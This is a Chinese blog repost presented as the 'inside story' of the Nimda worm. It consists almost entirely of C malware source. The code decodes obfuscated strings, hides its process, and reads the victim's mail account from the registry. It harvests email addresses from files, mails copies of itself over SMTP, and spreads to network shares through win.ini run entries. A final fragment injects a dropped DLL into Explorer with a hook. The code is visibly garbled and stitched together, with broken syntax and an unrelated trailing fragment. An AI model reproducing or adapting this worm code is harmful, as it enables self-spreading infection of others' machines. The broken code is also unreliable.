Nimda程式設計內幕 (轉)

worldblog發表於2007-12-12
Nimda程式設計內幕 (轉)[@more@]

void WIN worm()
long w0rm_ThreadCodeList[ 3] = { 
 ( long) L0calThread,
 ( long) Rem0teThread,
 ( long) Thread
 } ;

 char *StrArray[ 66] = {
 szCopyRight,
 szFakeMsg,
 szSetUp,
 szOpenEnumA,
 szWNetCloseEnum,
 szWNetEnumReA,
 szMPR_DLL,
 szWINSOCK_DLL,
 szWtartup,
 szinet_addr,
 szgethostbyaddr,
 szgethostbyname,
 szhtons,
 szsocket,
 szconnect,
 szsend,
 szrecv,
 szclosesocket,
 szWSACleanup,
 smtp_str00,
 smtp_str01,
 smtp_str02,
 smtp_str03,
 smtp_str06,
 smtp_str07,
 smtp_str08,
 smtp_str09,
 smtp_str0B,
 smtp_str0C,
 smtp_str0D,
 smtp_str0E,
 smtp_str0F,
 smtp_newline,
 smtp_separator,
 szWindir00,
 szWindir01,
 szWindir02,
 szWindir03,
 szWindir04,
 szWIN_INI,
 szSETUP_EXE,
 szSYSTEM_EXE,
 szADVAPI_DLL,
 szRegOpenKeyExA,
 szRegQueryValueExA,
 szRegCloseKey,
 szAccountManager,
 szDefaultMail,
 szAccounts,
 szSMTPserver,
 szSMTP,
 szExt00,
 szExt01,
 szExt02,
 szExt03,
 szExt04,
 szExt05,
 szExt06,
 sz,
 szCute,
 szInternetExplorer,
 sz,
 szMirc,
 szRegisterServiceProcess,
 szKernel32,
 szTempFile
 } ;

 static HANDLE w0rm_hThreadList[ 3] ;
 D w0rm_ThreadIDList[ 3] ;
 char szModule[ MAX_PATH] ;
 char *Param ;
 int count ;
 int min_threads ;
 int max_threads ;
 BOOL re_generation ;

 MailDone = FALSE ;

 for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

 GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
 Param = szModule ;

 while( *Param != 0) Param++ ;

 Param -= 5 ;

 if (( *Param == 'P') || ( *Param == 'p'))
 {
 MessageBox( NULL,
 szFakeMsg,
 szSetUp,
 MB_OK | MB_ICONSTOP) ;

 re_generation = FALSE ;
 max_threads = 1 ;
 } 
 else
 {
 if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
 {
 if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
 {
 a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
 }
 }
 
 re_generation = TRUE ;
 max_threads = 3 ;
 }

 min_threads = 0 ;

 do
 {
 for ( count = min_threads ; count < max_threads ; count++ )
 {
 w0rm_hThreadList[ count] = CreateThread( NULL,
 0,
 ( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
 NULL,
 0,
 &w0rm_ThreadIDList[ count]) ;
 }

 for ( count = min_threads ; count < max_threads ; count++ )
 {
 if ( w0rm_hThreadList[ count] != NULL)
 {
 WaitForSingle( w0rm_hThreadList[ count], INFINITE) ;
 CloseHandle ( w0rm_hThreadList[ count]) ;
 }
 }

 if ( MailDone)
 {
 GetDirectoryA( szModule, MAX_PATH) ;
 strcat( szModule, szWIN_INI) ;
 WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
 re_generation = FALSE ;
 }

 min_threads = 1 ;

 if ( re_generation) Sleep( 0x000FFFFF) ;

 } while( re_generation) ;

 return 0 ;
}

long WINAPI MailThread(long lParam)
{
 unsigned int addr ;
 struct sockaddr_in server ;
 struct hostent *hp ;
 WSADATA wsaData ;

 HANDLE hFile ;
 HANDLE hMap ;

 char enc0de_filename[ MAX_PATH] ;
 char ShortBuff[ 512] ;
 char szSIGN[ 512] ;
 char szHELO[ 512] ;

 BOOL Success ;
 void *lpFile ;
 
 int  StrCount ;
 int  FileSize ;

 typedef struct
 {
 char *Command ;
 BOOL WaitReply ;
 }
 SMTPstr ;

 SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE  ,
 szMAIL_FROM, TRUE  } ;

 SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE  ,
 szMAIL_FROM+5, FALSE ,
 smtp_str06, FALSE ,
 smtp_str07, FALSE ,
 smtp_separator, FALSE ,
 smtp_str08, FALSE ,
 smtp_separator, FALSE ,
 smtp_str09, FALSE ,
 szSIGN, FALSE ,
 smtp_separator, FALSE ,
 smtp_str0B, FALSE } ;

 SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
 smtp_separator, FALSE ,
 smtp_str0D, FALSE ,
 smtp_newline, FALSE ,
 smtp_str0E, TRUE,
 smtp_str0F, FALSE } ;
 WaitC0nnected() ;

 if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
 
 sprintf( szHELO, "%s %sn", smtp_str00, szSMTPname) ;
 sprintf( szMAIL_FROM, "%s n", smtp_str01, szSMTPaddr) ;
 sprintf( szSIGN,"n:)nn----n%snn--", szSMTPaddr) ;

 if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

 a_WSAStartup = ( FROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
 a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
 a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
 a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
 a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
 a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
 a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
 a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
 a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
 a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
 a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

 if ( ( a_WSAStartup == NULL) ||
  ( a_inet_addr == NULL) ||
  ( a_gethostbyaddr == NULL) ||
  ( a_gethostbyname == NULL) ||
  ( a_htons == NULL) ||
  ( a_socket == NULL) ||
  ( a_connect == NULL) ||
  ( a_send == NULL) ||
  ( a_recv == NULL) ||
  ( a_closesocket == NULL) ||
  ( a_WSACleanup == NULL))
 {
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
 {
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }
 
 if ( isalpha( ( int) szSMTPserver[ 0]))
 {
 hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
 }
 else 
 {
 addr = a_inet_addr( szSMTPname) ;
 hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
 }

 if ( hp == NULL)
 {
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 memset( &server, 0, sizeof( server)) ;
 memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
 server.sin_family = hp->h_addrtype ;
 server.sin_port = a_htons( 25) ;

 conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

 if ( conn_socket < 0 )
 {
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
 {
 a_closesocket( conn_socket) ; 
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;
 }

 a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
 
 for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
 {
 Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
 if ( !Success) break ; 
 }
 
 if ( Success)
 {
 Found = 0 ;

 GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
 enc0de_filename[ 3] = 0 ;

 FindPe0ple( enc0de_filename) ; 
 
 for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
 {
 Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
 if ( !Success) break ; 
 }

 if ( Success)
 {
 GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
 GetTempPathA( MAX_PATH, enc0de_filename) ;
 strcat( enc0de_filename, szTempFile) ;

 if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
 {
 if ( ( hFile = CreateFileA( enc0de_filename,
 GENERIC_READ,
 FILE_SHARE_READ,
 NULL,
 OPEN_EXISTING,
 FILE_ATTRIBUTE_NORMAL,
 NULL)) != INVALID_HANDLE_VALUE)
 {
 FileSize = GetFileSize( hFile, NULL) ;

 if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
 {
 if ( ( hMap = CreateFileMapA( hFile,
 NULL,
 PAGE_READONLY | PAGE_WRITECOPY,
 0,
 FileSize,
 NULL)) != NULL)
 {
 if ( ( lpFile = MapViewOfFile( hMap,
 FILE_MAP_READ,
 0,
 0,
 FileSize)) != NULL)
 { 
 base64_encode( lpFile, FileSize) ;

 for ( StrCount = 0 ; StrCount < 6 ; StrCount++ ) 
 {
 if ( ( Success = str2socket(  SMTPstrings02[ StrCount].Command,
 SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
 }

 if ( Success) MailDone = TRUE ;

 UnmapViewOfFile( lpFile) ;
 }
 
 CloseHandle( hMap) ;
 }
 }

 CloseHandle( hFile) ;
 }

 DeleteFileA( enc0de_filename) ;
 }
 }
 }

 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;

 return 0 ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void NetW0ng( LPNETRESOURCE lpnr)
{
 LPNETRESOURCE lpnrLocal ;
 HANDLE hEnum ;
 int count ;
 int cEntries = 0xFFFFFFFF ;
 DWORD dwResult ;
 DWORD cbBuffer = 32768 ;

 if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
 RESOURCETYPE_ANY,
 0,
 lpnr,
 &hEnum) != NO_ERROR) return ;
 do
 {
 lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

   dwResult = a_WNetEnumResource( hEnum,
 &cEntries,
 lpnrLocal,
 &cbBuffer) ;
 if ( dwResult == NO_ERROR)
 {
 for ( count = 1 ; count < cEntries ; count++ )
 {
 if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
 {
 NetW0rming( &lpnrLocal[ count]) ;
 }
 else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
 {
 Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
 }
 }
 }
 else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

 } while ( dwResult != ERROR_NO_MORE_ITEMS) ;

 GlobalFree ( ( HGLOBAL) lpnrLocal) ;

 a_WNetCloseEnum( hEnum) ;

 return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void Rem0teInfecti0n( char *szPath)
{
 char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
 _FIND_DATAA FindData ;
 HANDLE hFind ;
 char szLookUp[ MAX_PATH] ;
 char w0rm0rg[ MAX_PATH] ;
 char w0rmD3st[ MAX_PATH] ;
 int aux ;

 for ( aux = 0 ; aux < 5 ; aux++ )
 {
 sprintf ( szLookUp, "%s%s%s", szPath, dir_name[ aux], szWIN_INI) ;
 if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
 { 
 sprintf( w0rmD3st, "%s%s%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
 
 if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
 {
 if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
 {
 WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
 FindClose ( hFind) ;
 break ;
 }
 }

 FindClose ( hFind) ;
 }
 }
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL str2socket( char *msg, BOOL do_recv)

 int retval ;
 char Buffer[ 256];

/* Code used to de the wo

 if ( do_recv)
 {
 if ( MessageBox( NULL,
 msg,
 "send() this string ?",
 MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
 }
*/

 if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
 {
 a_WSACleanup() ;
 return FALSE ;
 } 

 if ( do_recv)
 {
 retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
 if ( ( retval == SOCKET_ERROR) || ( retval == 0))
 { 
 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 return FALSE ;
 }

 Buffer[ retval] = 0 ;

/* Code used to debug the worm

 MessageBox( NULL,
 Buffer,
 "recv()",
 MB_OK | MB_ICONSTOP) ;
*/
 }

 return TRUE ;

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL GetSMTP( char *dest, char *org_email)
{
 char szKeyName[ MAX_PATH] ;
 char szRes[ MAX_PATH] ;
 char *move2low ;
 int size ;
 HKEY hKey ;

 if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
 
 a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
 a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
 a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

 if ( ( a_RegOpenKeyExA == NULL) ||
  ( a_RegQueryValueExA == NULL) ||
  ( a_RegCloseKey == NULL))
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 strcpy( szKeyName, szAccountManager) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
 szKeyName,
 0,
 KEY_QUERY_VALUE,
 &hKey) != ERROR_SUCCESS)
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }
 
 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szDefaultMail,
 0,
 NULL,
 szRes,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 a_RegCloseKey( hKey) ;

 strcat( szKeyName, szAccounts) ;
 strcat( szKeyName, szRes) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
 szKeyName,
 0,
 KEY_QUERY_VALUE,
 &hKey) != ERROR_SUCCESS)
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szSMTPserver,
 0,
 NULL,
 dest,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 } 

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szSMTPemail,
 0,
 NULL,
 org_email,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 } 

 a_RegCloseKey( hKey) ;

 move2low = org_email ;

 while( *move2low != 0)
 {
 if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
 move2low++ ;
 }

 FreeLibrary( hADVAPI) ;
 return TRUE ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void base64_encode(const void *buf, int size)
{
 char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

 char ok_base64[ 80] ;
 char *p = ok_base64 ;
 unsigned char *q = ( unsigned char *) buf ;
 int i ;
 int c ;
 int l ;
 BOOL SendRes ;
 
 i = l = 0 ;

 while( i < size)
 {
 c = q[ i++] ;
 c *= 256 ;

 if( i < size) c += q[ i] ;
 
 i++ ;
 c *= 256 ;

 if( i < size) c += q[ i] ;
 
 i++ ;
 
 p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
 p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
 p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
 p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
 
 if( i > size) p[ 3] = '=' ;
 
 if( i > size + 1) p[ 2] = '=' ;
 
 p += 4 ;
 
 l += 1 ;

 if ( l == 0x013)
 {
 ok_base64[ 0x04C] = 0x0A ;
 ok_base64[ 0x04D] = 0 ;

 if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

 p = ok_base64 ;
 l = 0;
 }
 }

 if ( SendRes != FALSE)
 {
 if ( l != 0)
 {
 ok_base64[ l*4] = 0x0A ;
 ok_base64[ l*4] = 0 ;

 str2socket( ok_base64, FALSE) ; 
 }
 }
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

char *DecryptStr( char *DcrStr)
{
 char *p= DcrStr ;

 while( *pos != 0)
 {
 *pos ^= ( char) 0x0FF ;
 pos++ ;
 }
 
 return DcrStr ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void FindPe0ple( char *szPath)
{
 char szRecursive[ MAX_PATH] ;
 char szCurrentDir[ MAX_PATH] ;
 char FileExt[ MAX_PATH] ;
 char RCPT_TO[ MAX_PATH] ;
 WIN32_FIND_DATAA FindData ;
 HANDLE hFind ;
 HANDLE hFile ;
 HANDLE hMap ;
 void *lpFile ;
 char *lpc01 ;
 char *lpc02 ;
 char *lpc03 ;
 char *lpc04 ;
 char auxchar ;
 int l00king ;
 int addrssize ;

 GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
 
 if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

 hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
 if ( hFind != INVALID_HANDLE_VALUE)
 {
 do
 {
 if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
 {
 strcpy (szRecursive,szPath) ;
 strcat (szRecursive,FindData.cFileName) ;
 strcat (szRecursive,"") ;
 
 FindPe0ple( szRecursive) ;
 }
 else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))) 
 {
 lpc01 = FindData.cFileName ;
 lpc02 = NULL ;
 
 while ( *lpc01 != 0)
 {
 if ( *lpc01 == 46) lpc02 = lpc01 ;
 lpc01++ ;
 }
 
 lpc01 = FileExt ;

 if ( lpc02 != NULL)
 {
 while ( *lpc02 != 0)
 {
 if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
 else *lpc01 = *lpc02 ;
 
 lpc01++ ;
 lpc02++ ;
 }

 FileExt[ 4] = 0 ;

 if  ( ( strcmp( FileExt, szExt00) == 0) ||
 ( strcmp( FileExt, szExt01) == 0) ||
 ( strcmp( FileExt, szExt02) == 0) ||
 ( strcmp( FileExt, szExt03) == 0) ||
 ( strcmp( FileExt, szExt04) == 0) ||
 ( strcmp( FileExt, szExt05) == 0) ||
 ( strcmp( FileExt, szExt06) == 0))
 {
 if ( ( hFile = CreateFileA( FindData.cFileName,
 GENERIC_READ,
 0,
 NULL,
 OPEN_EXISTING,
 FILE_ATTRIBUTE_NORMAL,
 NULL)) != INVALID_HANDLE_VALUE)
 {
 if ( ( hMap = CreateFileMappingA( hFile,
 NULL,
 PAGE_READONLY,
 0,
 FindData.nFileSizeLow,
 NULL)) != NULL)
 {
 if ( ( lpFile = MapViewOfFile( hMap,
 FILE_MAP_READ,
 0,
 0,
 FindData.nFileSizeLow)) != NULL)
 {
 lpc01 = lpFile ;
 addrssize = FindData.nFileSizeLow ;
 l00king = 0 ;
 
 while( ( addrssize > 16) && ( Found < 16))
 {
 if ( *lpc01 == 60)
 {
 l00king = 1 ;
 lpc02 = lpc01 ;
 }

 if ( ( *lpc01 == 64) && ( l00king == 1))
 {
 l00king = 2 ;
 }

 if ( ( *lpc01 == 62) && ( l00king == 2))
 { 
 lpc03 = szSMTPaddr ;
 lpc04 = lpc02 + 1 ;

 while ( *lpc03 != 0)
 {
 auxchar = *lpc04 ;

 if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

 if ( *lpc03 != auxchar)
 {
 l00king = 0 ;
 break ;
 }

 lpc03++ ;
 lpc04++ ;
 }

 if ( l00king == 0)
 {
 strcpy( RCPT_TO, smtp_str02) ;
 lpc03 = RCPT_TO + 9 ;
 while ( *lpc02 != 62)
 {
 *lpc03 = *lpc02 ;
 lpc02++ ;
 lpc03++ ;
 }
 *lpc03 = 62 ;
 lpc03++ ; 
 *lpc03 = 0 ;
 
 strcat( RCPT_TO, "n") ;

 str2socket( RCPT_TO, TRUE) ;

 Found++ ;
 }
 else l00king = 0 ;
 }

 if ( ( *lpc01 < 64) &&
 ( *lpc01 != 46) &&
 ( *lpc01 != 60) &&
 ( *lpc01 != 62))
 {
 l00king = 0 ;
 }

 if ( *lpc01 > 122)
 {
 l00king = 0 ;
 }
 
 lpc01++ ;
 addrssize-- ;
 }
 
 UnmapViewOfFile( lpFile) ; 
 }

 CloseHandle( hMap) ;
 }
 
 CloseHandle( hFile) ;
 }
 }
 }
 }
 } 
 while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

 FindClose( hFind) ;
 }

 return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void WaitC0nnected( void)
{
 InetActivated = FALSE ;

 while ( !InetActivated)
 {
 EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

 Sleep( 0x01770) ;
 }

 return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

 int  CaptionLen ;
 int  AwareLen ;
 int  CompareLen ;
 int  InetAware ;
 int  EquChar ;
 int  aux0 ;
 int  aux1 ;
 char  *Foll0w ;
 char  *PtrAware ;
 char  WindowCaption[ 1024] ;

 CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

 if ( CaptionLen > 0)
 {
 Foll0w = WindowCaption ;

 while( *Foll0w != 0)
 {
 if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
 Foll0w++ ;
 }

 for(Aware = 0 ; InetAware < 5 ; InetAware++)
 {
 AwareLen = strlen( szAware[ InetAware]) ;
 
 if ( AwareLen < CaptionLen)
 {
 CompareLen = CaptionLen - AwareLen ; 

 for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
 {
 EquChar = 0 ;
 Foll0w = &WindowCaption[ aux0] ;
 PtrAware = szAware[ InetAware] ;

 for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
 {
 if ( *Foll0w == *PtrAware) EquChar++ ;
 }

 if ( EquChar == AwareLen)
 {
 InetActivated = TRUE ;
 break ;
 }

 aux0++ ;
 }
 }
 }
 }

 return ( !InetActivated) ;
}
 void TFTP32()
{
  HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
 if(hFile==INVALID_HANDLE_VALUE)
 {
 //printf("nCreate file %s failed:%d",RemoteFilePath,GetLastError());
 return -1
 }
 //寫內容
  DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
 while(dwSize>dwIndex)
 {
 if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
 {
 //printf("nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
 return -1
 }
 dwIndex+=dwWrite;
 }
 //關閉檔案控制程式碼
 CloseHandle(hFile);


hhook hk
STARTUPINFO si;
  PROCESS_INFORMATION pi;
 
  memset(&si,0,sizeof(si));
  si.hStdError = si.hStdOutput = wp1;
  si.hStdInput = rp2;
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_H;
  si.lpReserved=0;
  si.lpReserved2=0;
  si.cbReserved2 =0;
  si.cb = sizeof(si);
  //this two must not
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
 hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-991862/,如需轉載,請註明出處,否則將追究法律責任。

相關文章